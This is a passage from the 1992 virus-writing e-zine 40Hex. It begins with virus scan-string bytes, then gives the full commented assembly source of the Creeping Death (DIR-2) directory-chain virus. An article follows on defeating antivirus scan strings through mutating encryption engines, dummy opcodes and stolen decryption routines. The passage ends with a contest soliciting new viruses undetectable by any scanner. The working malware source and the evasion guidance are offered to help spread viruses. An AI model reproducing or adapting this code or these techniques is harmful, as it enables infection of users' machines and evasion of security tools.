Doodle Virus [Doodle]: 0x35 0xcd 0x21 0x8b 0xf3 0x8c 0xc7 Suriv A Virus [SurivA]: 0x90 0x73 0x55 0x52 0x49 0x56 0x00 Suriv B Virus [SurivB]: 0x00 0x73 0x55 0x52 0x49 0x56 0x00 ]============================================================================[ 40Hex Number 6 Volume 2 Issue 2 File 00A Welcome to this issue's VIRUS SPOTLITE, the infamous Creeping Death(dir2). This is one of the most impressive viruses out there, and VirusSoft looks to be a promising group in the future. Unfortunately, the source code we obtained had almost no comments. Dark Angel commented it as best as he possibly could, but I think it is safe to say that there may be a few discrepancies. Nonetheless, it was an excellent job, kudos to DA. Although I am writing this header, I had nothing to do with the commenting, so Dark Angel gets all the credit. -)GHeap ------------------------------------------------------------------------------- ; Dark Angel's comments: I spent my entire waking hours looking at this virus. ; I love it. It is my life. I worship the drive it ; infects. Take a look at it. Let not my troubles be ; in vain. Why did I do this? I sacrifice my life for ; the benefit of 40Hex. If you don't read this, I'm ; gonna go join [NuKE]. ; Creeping Death V 1.0 ; ; (C) Copyright 1991 by VirusSoft Corp. i13org = 5f8h i21org = 5fch dir_2 segment byte public assume cs:dir_2, ds:dir_2 org 100h start: mov sp,600h ; Set up the stack pointer inc word ptr counter ; Generation counter xor cx,cx mov ds,cx ; DS points to interrupt table lds ax, ds:[0c1h] ; Find interrupt 30h add ax,21h ; Change it to Int 21h push ds ; Save it on stack for use by push ax ; subroutine "jump" mov ah,30h ; Get DOS version call jump cmp al,4 ; DOS 4.X+ : SI = 0 sbb si,si ; DOS 2/3 : SI = -1 mov byte ptr [drive+2],byte ptr -1 ; Initialise last drive to ; "never accessed" mov bx,60h ; Adjust memory in ES to mov ah,4ah ; BX paragraphs. call jump mov ah,52h ; Get DOS List of Lists call jump ; to ES:BX push es:[bx-2] ; Save Segment of first MCB lds bx,es:[bx] ; DS:BX -> 1st DPB ; (Drive parameter block) search: mov ax,[bx+si+15h] ; Get segment of device driver cmp ax,70h ; Is it CONFIG? (I think) jne next ; If not, try again xchg ax,cx ; Move driver segment to CX mov [bx+si+18h],byte ptr -1 ; Flag block must be rebuilt mov di,[bx+si+13h] ; Save offset of device driver ; Original device driver ; address in CX:DI mov [bx+si+13h],offset header ; Replace with our own mov [bx+si+15h],cs ; (header) next: lds bx,[bx+si+19h] ; Get next device block cmp bx,-1 ; Is it the last one? jne search ; If not, search it jcxz install pop ds ; Restore segment of first mov ax,ds ; MCB add ax,ds:[3] ; Go to next MCB inc ax ; AX = segment next MCB mov dx,cs ; DX = MCB owning current dec dx ; program cmp ax,dx ; Are these the same? jne no_boot ; If not, we are not currently ; in the middle of a reboot add word ptr ds:[3],61h ; Increase length owned by ; MCB by 1552 bytes no_boot: mov ds,dx ; DS = MCB owning current ; program mov word ptr ds:[1],8 ; Set owner = DOS mov ds,cx ; DS = segment of original ; device driver les ax,[di+6] ; ES = offset int handler ; AX = offset strategy entry mov word ptr cs:str_block,ax ; Save entry point mov word ptr cs:int_block,es ; And int block for use in ; function _in cld ; Scan for the write mov si,1 ; function in the scan: dec si ; original device driver lodsw cmp ax,1effh jne scan mov ax,2cah ; Wicked un-yar place o' cmp [si+4],ax ; doom. je right cmp [si+5],ax jne scan right: lodsw push cs pop es mov di,offset modify+1 ; Save address of patch stosw ; area so it can be changed xchg ax,si ; later. mov di,offset i13org ; This is in the stack, but cli ; it is used by "i13pr" movsw movsw mov dx,0c000h ; Scan for hard disk ROM ; Start search @ segment C000h fdsk1: mov ds,dx ; Load up the segment xor si,si ; atart at offset 0000h lodsw ; Scan for the signature cmp ax,0aa55h ; Is it the signature? jne fdsk4 ; If not, change segment cbw ; clear AH lodsb ; load a byte to AL mov cl,9 sal ax,cl ; Shift left, 0 filled fdsk2: cmp [si],6c7h jne fdsk3 cmp word ptr [si+2],4ch jne fdsk3 push dx ; Save the segment push [si+4] ; and offset on stack jmp short death ; for use by i13pr install: int 20h file: db "c:",255,0 fdsk3: inc si ; Increment search offset cmp si,ax ; If we are not too high, jb fdsk2 ; try again fdsk4: inc dx ; Increment search segment cmp dh,0f0h ; If we are not in high jb fdsk1 ; memory, try again sub sp,4 ; effectively push dummy vars. death: push cs ; on stack for use by i13pr pop ds mov bx,ds:[2ch] ; Get environment from PSP mov es,bx mov ah,49h ; Release it (to save memory) call jump xor ax,ax test bx,bx ; Is BX = 0? jz boot ; If so, we are booting now mov di,1 ; and not running a file seek: dec di ; Search for end of scasw ; the environment block jne seek lea si,[di+2] ; SI points to filename jmp short exec ; (in DOS 3.X+) ; Execute that file boot: mov es,ds:[16h] ; get PSP of parent mov bx,es:[16h] ; get PSP of parent dec bx ; go to its MCB xor si,si exec: push bx mov bx,offset param ; Set up parameter block ; for EXEC function mov [bx+4],cs ; segment to command line mov [bx+8],cs ; segment to 1st FCB mov [bx+12],cs ; segment to 2nd FCB pop ds push cs pop es mov di,offset f_name push di ; Save filename offset mov cx,40 ; Copy the filename to rep movsw ; the buffer push cs pop ds mov ah,3dh ; Handle open file mov dx,offset file ; "c:ÿ",0 call jump pop dx ; DS:DX -> filename mov ax,4b00h ; Load and Execute call jump ; ES:BX = param block mov ah,4dh ; Get errorlevel call jump mov ah,4ch ; Terminate jump: pushf ; Simulate an interrupt 21h call dword ptr cs:[i21org] ret ;--------Installation complete i13pr: mov ah,3 ; Write AL sectors from ES:BX jmp dword ptr cs:[i13org] ; to track CH, sector CL, ; head DH, drive DL main: push ax ; driver push cx ; strategy block push dx push ds push si push di push es ; Move segment of parameter pop ds ; block to DS mov al,[bx+2] ; [bx+2] holds command code cmp al,4 ; Input (read) je input cmp al,8 ; Output (write) je output cmp al,9 ; Output (write) with verify je output call in_ ; Call original device cmp al,2 ; Request build BPB jne ppp ; If none of the above, exit lds si,[bx+12h] ; DS:SI point to BPB table mov di,offset bpb_buf ; Replace old pointer with mov es:[bx+12h],di ; a pointer to our own mov es:[bx+14h],cs ; BPB table push es ; Save segment of parameters push cs pop es mov cx,16 ; Copy the old BPB table to rep movsw ; our own pop es ; Restore parameter segment push cs pop ds mov al,[di+2-32] ; AL = sectors per allocation cmp al,2 ; unit. If less than adc al,0 ; 2, increment cbw ; Extend sign to AH (clear AH) cmp word ptr [di+8-32],0 ; Is total number sectors = 0? je m32 ; If so, big partition (>32MB) sub [di+8-32],ax ; Decrease space of disk by ; one allocation unit(cluster) jmp short ppp ; Exit m32: sub [di+15h-32],ax ; Handle large partitions sbb word ptr [di+17h-32],0 ppp: pop di pop si pop ds pop dx pop cx pop ax rts: retf ; We are outta here! output: mov cx,0ff09h call check ; is it a new disk? jz inf_sec ; If not, go away call in_ ; Call original device handler jmp short inf_dsk inf_sec: jmp _inf_sec read: jmp _read read_: add sp,16 ; Restore the stack jmp short ppp ; Leave device driver input: call check ; Is it a new disk? jz read ; If not, leave inf_dsk: mov byte ptr [bx+2],4 ; Set command code to READ cld lea si,[bx+0eh] ; Load from buffer address mov cx,8 ; Save device driver request save: lodsw ; on the stack push ax loop save mov word ptr [bx+14h],1 ; Starting sector number = 1 ; (Read 1st FAT) call driver ; Read one sector jnz read_ ; If error, exit mov byte ptr [bx+2],2 ; Otherwise build BPB call in_ ; Have original driver do the ; work lds si,[bx+12h] ; DS:SI points to BPB table mov ax,[si+6] ; Number root directory entries add ax,15 ; Round up mov cl,4 shr ax,cl ; Divide by 16 to find sectors ; of root directory mov di,[si+0bh] ; DI = sectors/FAT add di,di ; Double for 2 FATs stc ; Add one for boot record adc di,ax ; Add sector size of root dir push di ; to find starting sector of ; data (and read) cwd ; Clear DX mov ax,[si+8] ; AX = total sectors test ax,ax ; If it is zero, then we have jnz more ; an extended partition(>32MB) mov ax,[si+15h] ; Load DX:AX with total number mov dx,[si+17h] ; of sectors more: xor cx,cx sub ax,di ; Calculate FAT entry for last ; sector of disk sbb dx,cx mov cl,[si+2] ; CL = sectors/cluster div cx ; AX = cluster # cmp cl,2 ; If there is more than 1 sbb ax,-1 ; cluster/sector, add one push ax ; Save cluster number call convert ; AX = sector number to read ; DX = offset in sector AX ; of FAT entry ; DI = mask for EOF marker mov byte ptr es:[bx+2],4 ; INPUT (read) mov es:[bx+14h],ax ; Starting sector = AX call driver ; One sector only again: lds si,es:[bx+0eh] ; DS:SI = buffer address add si,dx ; Go to FAT entry sub dh,cl ; Calculate a new encryption adc dx,ax ; value mov word ptr cs:gad+1,dx ; Change the encryption value cmp cl,1 ; If there is 0 cluster/sector je small_ ; then jump to "small_" mov ax,[si] ; Load AX with offset of FAT ; entry and ax,di ; Mask it with value from ; "convert" then test to see ; if the sector is fine cmp ax,0fff7h ; 16 bit reserved/bad je bad cmp ax,0ff7h ; 12 bit reserved/bad je bad cmp ax,0ff70h ; 12 bit reserved/bad jne ok bad: pop ax ; Tried to replicate on a bad dec ax ; cluster. Try again on a push ax ; lower one. call convert ; Find where it is in the FAT jmp short again ; and try once more small_: not di ; Reverse mask bits and [si],di ; Clear other bits pop ax ; AX = cluster number push ax inc ax ; Need to do 2 consecutive push ax ; bytes mov dx,0fh test di,dx jz here inc dx ; Multiply by 16 mul dx here: or [si],ax ; Set cluster to next pop ax ; Restore cluster of write call convert ; Calculate buffer offset mov si,es:[bx+0eh] ; Go to FAT entry (in buffer) add si,dx mov ax,[si] and ax,di ok: mov dx,di ; DI = mask from "convert" dec dx and dx,di ; Yerg! not di and [si],di or [si],dx ; Set [si] to DI cmp ax,dx ; Did we change the FAT? pop ax ; i.e. Are we already on this pop di ; disk? mov word ptr cs:pointer+1,ax ; Our own starting cluster je _read_ ; If we didn't infect, then ; leave the routine. Oh ; welp-o. mov dx,[si] push ds push si call write ; Update the FAT pop si pop ds jnz _read_ ; Quit if there's an error call driver cmp [si],dx jne _read_ dec ax dec ax mul cx ; Multiply by sectors/cluster ; to find the sector of the ; write add ax,di adc dx,0 push es pop ds mov word ptr [bx+12h],2 ; Byte/sector count mov [bx+14h],ax ; Starting sector # test dx,dx jz less mov word ptr [bx+14h],-1 ; Flag extended partition mov [bx+1ah],ax ; Handle the sector of the mov [bx+1ch],dx ; extended partition less: mov [bx+10h],cs ; Transfer address segment mov [bx+0eh],100h ; and the offset (duh) call write ; Zopy ourselves! ; (We want to travel) _read_: std lea di,[bx+1ch] ; Restore device driver header mov cx,8 ; from the stack load: pop ax stosw loop load _read: call in_ ; Call original device handler mov cx,9 _inf_sec: mov di,es:[bx+12h] ; Bytes/Sector lds si,es:[bx+0eh] ; DS:SI = pointer to buffer sal di,cl ; Multiply by 512 ; DI = byte count xor cl,cl add di,si ; Go to address in the buffer xor dl,dl ; Flag for an infection in ; function find push ds push si call find ; Infect the directory jcxz no_inf call write ; Write it back to the disk and es:[bx+4],byte ptr 07fh ; Clear error bit in status ; word no_inf: pop si pop ds inc dx ; Flag for a decryption in ; function find call find ; Return right information to ; calling program jmp ppp ;--------Subroutines find: mov ax,[si+8] ; Check filename extension cmp ax,"XE" ; in directory structure jne com cmp [si+10],al je found com: cmp ax,"OC" jne go_on cmp byte ptr [si+10],"M" jne go_on found: test [si+1eh],0ffc0h ; >4MB ; Check file size high word jnz go_on ; to see if it is too big test [si+1dh],03ff8h ; <2048B ; Check file size low word jz go_on ; to see if it is too small test [si+0bh],byte ptr 1ch ; Check attribute for subdir, jnz go_on ; volume label or system file test dl,dl ; If none of these, check DX jnz rest ; If not 0, decrypt pointer: mov ax,1234h ; mov ax, XX modified elsewhere cmp ax,[si+1ah] ; Check for same starting ; cluster number as us je go_on ; If it is, then try another xchg ax,[si+1ah] ; Otherwise make it point to ; us. gad: xor ax,1234h ; Encrypt their starting ; cluster mov [si+14h],ax ; And put it in area reserved ; by DOS for no purpose loop go_on ; Try another file rest: xor ax,ax ; Disinfect the file xchg ax,[si+14h] ; Get starting cluster xor ax,word ptr cs:gad+1 ; Decrypt the starting cluster mov [si+1ah],ax ; and put it back go_on: db 2eh,0d1h,6 ; rol cs:[gad+1], 1 dw offset gad+1 ; Change encryption and add si,32 ; go to next file cmp di,si ; If it is not past the end of jne find ; the buffer, then try again ret ; Otherwise quit check: mov ah,[bx+1] ; ah = unit code (block device ; only) drive: cmp ah,-1 ; cmp ah, XX can change. ; Compare with the last call ; -1 is just a dummy ; impossible value that will ; force the change to be true mov byte ptr cs:[drive+2],ah ; Save this call's drive jne changed ; If not the same as last call ; media has changed push [bx+0eh] ; If it is the same physical ; drive, see if floppy has ; been changed mov byte ptr [bx+2],1 ; Tell original driver to do a call in_ ; media check (block only) cmp byte ptr [bx+0eh],1 ; Returns 1 in [bx+0eh] if pop [bx+0eh] ; media has not been changed mov [bx+2],al ; Restore command code changed: ret ; CF,ZF set if media has not ; been changed, not set if ; has been changed or we don't ; know write: cmp byte ptr es:[bx+2],8 ; If we want OUTPUT, go to jae in_ ; original device handler ; and return to caller mov byte ptr es:[bx+2],4 ; Otherwise, request INPUT mov si,70h mov ds,si ; DS = our segment modify: mov si,1234h ; Address is changed elsewhere push [si] push [si+2] mov [si],offset i13pr mov [si+2],cs call in_ ; Call original device handler pop [si+2] pop [si] ret driver: mov word ptr es:[bx+12h],1 ; One sector in_: ; in_ first calls the strategy ; of the original device ; driver and then calls the ; interrupt handler db 09ah ; CALL FAR PTR str_block: dw ?,70h ; address db 09ah ; CALL FAR PTR int_block: dw ?,70h ; address test es:[bx+4],byte ptr 80h ; Was there an error? ret convert: cmp ax,0ff0h ; 0FFF0h if 12 bit FAT jae fat_16 ; 0FF0h = reserved cluster mov si,3 ; 12 bit FAT xor word ptr cs:[si+gad-1],si ; Change the encryption value mul si ; Multiply by 3 and shr ax,1 ; divide by 2 mov di,0fffh ; Mark it EOF (low 12 bits) jnc cont ; if it is even, continue mov di,0fff0h ; otherwise, mark it EOF (high jmp short cont ; 12 bits) and then continue fat_16: mov si,2 ; 16 bit FAT mul si ; Double cluster # mov di,0ffffh ; Mark it as end of file cont: mov si,512 div si ; AX = sector number ; (relative to start of FAT) ; DX = offset in sector AX header: inc ax ; Increment AX to account for ret ; boot record counter: dw 0 dw 842h ; Attribute ; Block device ; DOS 3 OPEN/CLOSE removable ; media calls supported ; Generic IOCTL call supported ; Supports 32 bit sectors dw offset main ; Strategy routine dw offset rts ; Interrupt routine (rtf) db 7fh ; Number of subunits supported ; by this driver. Wow, lookit ; it -- it's so large and juicy ; Parameter block format: ; 0 WORD Segment of environment ; 2 DWORD pointer to command line ; 6 DWORD pointer to 1st default FCB ;10 DWORD pointer to 2nd default FCB param: dw 0,80h,?,5ch,?,6ch,? bpb_buf: db 32 dup(?) f_name: db 80 dup(?) ;--------The End. dir_2 ends end start MsDos ------------------------------------------------------------------------------- 40Hex Number 6 Volume 2 Issue 2 File 00B ------------------------------ SCAN STRINGS, HOW THEY WORK, AND HOW TO AVOID THEM ------------------------------ By Dark Angel ------------------------------ Scan strings are the scourge of the virus author and the friend of anti- virus wanna-bes. The virus author must find encryption techniques which can successfully evade easy detection. This article will show you several such techniques. Scan strings, as you are well aware, are a collection of bytes which an anti-viral product uses to identify a virus. The important thing to keep in mind is that these scan strings represent actual code and can NEVER contain code which could occur in a "normal" program. The trick is to use this to your advantage. When a scanner checks a file for a virus, it searches for the scan string which could be located ANYWHERE IN THE FILE. The scanner doesn't care where it is. Thus, a file which consists solely of the scan string and nothing else would be detected as infected by a virus. A scanner is basically an overblown "hex searcher" looking for 1000 signatures. Interesting, but there's not much you can do to exploit this. The only thing you can do is to write code so generic that it could be located in any program (by chance). Try creating a file with the following debug script and scanning it. This demonstrates the fact that the scan string may be located at any position in the file. --------------------------------------------------------------------------- n marauder.com e 0100 E8 00 00 5E 81 EE 0E 01 E8 05 00 E9 rcx 000C w q --------------------------------------------------------------------------- Although scanners normally search for decryption/encryption routines, in Marauder's case, SCAN looks for the "setup" portion of the code, i.e. setting up BP (to the "delta offset"), calling the decryption routine, and finally jumping to program code. What you CAN do is to either minimise the scannable code or to have the code constantly mutate into something different. The reasons are readily apparent. The simplest technique is having multiple encryption engines. A virus utilising this technique has a database of encryption/decryption engines and uses a random one each time it infects. For example, there could be various forms of XOR encryption or perhaps another form of mathematical encryption. The trick is to simply replace the code for the encryption routine each time with the new encryption routine. Mark Washburn used this in his V2PX series of virii. In it, he used six different encryption/decryption algorithms, and some mutations are impossible to detect with a mere scan string. More on those later. Recently, there has been talk of the so-called MTE, or mutating engine, from Bulgaria (where else?). It utilises the multiple encryption engine technique. Pogue Mahone used the MTE and it took McAfee several days to find a scan string. Vesselin Bontchev, the McAfee-wanna-be of Bulgaria, marvelled the engineering of this engine. It is distributed as an OBJ file designed to be able to be linked into any virus. Supposedly, SCANV89 will be able to detect any virus using the encryption engine, so it is worthless except for those who have an academic interest in such matters (such as virus authors). However, there is a serious limitation to the multiple encryption technique, namely that scan strings may still be found. However, scan strings must be isolated for each different encryption mechanism. An additional benefit is the possibility that the antivirus software developers will miss some of the encryption mechanisms so not all the strains of the virus will be caught by the scanner. Now we get to a much better (and sort of obvious) method: minimising scan code length. There are several viable techniques which may be used, but I shall discuss but three of them. The one mentioned before which Mark Washburn used in V2P6 was interesting. He first filled the space to be filled in with the encryption mechanism with dummy one byte op-codes such as CLC, STC, etc. As you can see, the flag manipulation op-codes were exploited. Next, he randomly placed the parts of his encryption mechanism in parts of this buffer, i.e. the gaps between the "real" instructions were filled in with random dummy op-codes. In this manner, no generic scan string could be located for this encryption mechanism of this virus. However, the disadvantage of this method is the sheer size of the code necessary to perform the encryption. A second method is much simpler than this and possibly just as effective. To minimise scan code length, all you have to do is change certain bytes at various intervals. The best way to do this can be explained with the following code fragment: mov si, 1234h ; Starting location of encryption mov cx, 1234h ; Virus size / 2 + variable number loop_thing: xor word ptr cs:[si], 1234h ; Decrypt the value add si, 2 loop loop_thing In this code fragment, all the values which can be changed are set to 1234h for the sake of clarity. Upon infection, all you have to do is to set these variable values to whatever is appropriate for the file. For example, mov bx, 1234h would have to be changed to have the encryption start at the wherever the virus would be loaded into memory (huh?). Ponder this for a few moments and all shall become clear. To substitute new values into the code, all you have to do is something akin to: mov [bp+scratch+1], cx Where scratch is an instruction. The exact value to add to scratch depends on the coding of the op-code. Some op-codes take their argument as the second byte, others take the third. Regardless, it will take some tinkering before it is perfect. In the above case, the "permanent" code is limited to under five or six bytes. Additionally, these five or six bytes could theoretically occur in ANY PROGRAM WHATSOEVER, so it would not be prudent for scanners to search for these strings. However, scanners often use scan strings with wild-card-ish scan string characters, so it is still possible for a scan string to be found. The important thing to keep in mind when using this method is that it is best for the virus to use separate encryption and decryption engines. In this manner, shorter decryption routines may be found and thus shorter scan strings will be needed. In any case, using separate encryption and decryption engines increases the size of the code by at most 50 bytes. The last method detailed is theft of decryption engines. Several shareware products utilise decryption engines in their programs to prevent simple "cracks" of their products. This is, of course, not a deterrent to any programmer worth his salt, but it is useful for virus authors. If you combine the method above with this technique, the scan string would identify the product as being infected with the virus, which is a) bad PR for the company and b) unsuitable for use as a scan string. This technique requires virtually no effort, as the decryption engine is already written for you by some unsuspecting PD programmer. All the methods described are viable scan string avoidance techniques suitable for use in any virus. After a few practice tries, scan string avoidance should become second nature and will help tremendously in prolonging the effective life of your virus in the wild. 40Hex Number 6 Volume 2 Issue 2 File 00C ------------------------ Virus Contest! 'The Spammies(tm)' ------------------------ Deadline: July 4th, 1992 This is the first PHALCON/SKISM virus contest. As a matter of fact, this is the first contest of its kind. We believe that it will motivate you to produce more original code, rather than more hacks. Winners may have already won $10,000,000, as well as the prestige of winning the first ever 'Spammie' awards. Rules and Regulations: 1) All submissions must be original source code. (no hacks) 2) Only one submission is allowed per programmer, plus one group project. 3) All viruses must be recieved by us before July 4th, 1992. 4) Viruses must be accompanied by a complete entry form. (see below) 5) The original, compilable, commented source MUST be included, along with an installer program, or a dropper, in the case of boot block viruses. 6) Entries must include a location where the author may be contacted, such as an email address or a BBS. 7) Personnel or persons related to personnel of PHALCON/SKISM are not eligable. 8) The source must compile without error under Tasm or Masm (please specify what assembler and version you used, along with the necessary command line switches). If we cannot compile your virus, it will be disqualified. 9) All entries recieve a free subscription to 40hex. (hehehehe) 10) The entry must be uploaded privately to the sysop, stating that it is a contest entry. 11) The viruses must not be detectable by the current version (as of July 4th) of any known virus scanner. 12) Viruses will be judged by our 'panel of experts' in three catagories. 6.1) Stealth 6.2) Size 6.3) Reproductivity 6.4) Performance For example, Red Cross is an example of a 'high performance' virus. It was entertaining and well done. *** Entry Form Handle ________________________ Group Afiliation ______________ Virus Name ____________________ Size ____bytes (if you need more spaces, go away) Type ___ File Infector ___ Boot block Infection method ___ Direct Action ___ Memory Resident ___ Directory chain ___ Other (please describe it in detail) Encryption routine ___ None (bah) ___ Xor loop ___ Other (please describe it in detail) Describe what makes your infection routine unique. _______________________________________________________________________________ _______________________________________________________________________________ Describe what makes your encryption routine unique. _______________________________________________________________________________ _______________________________________________________________________________ Describe what means your virus uses, other than encryption, to keep itself hidden. _______________________________________________________________________________ _______________________________________________________________________________ What is the largest possible scan string for this virus? __bytes What else sets this virus apart from other viruses? _______________________________________________________________________________ _______________________________________________________________________________ _______________________________________________________________________________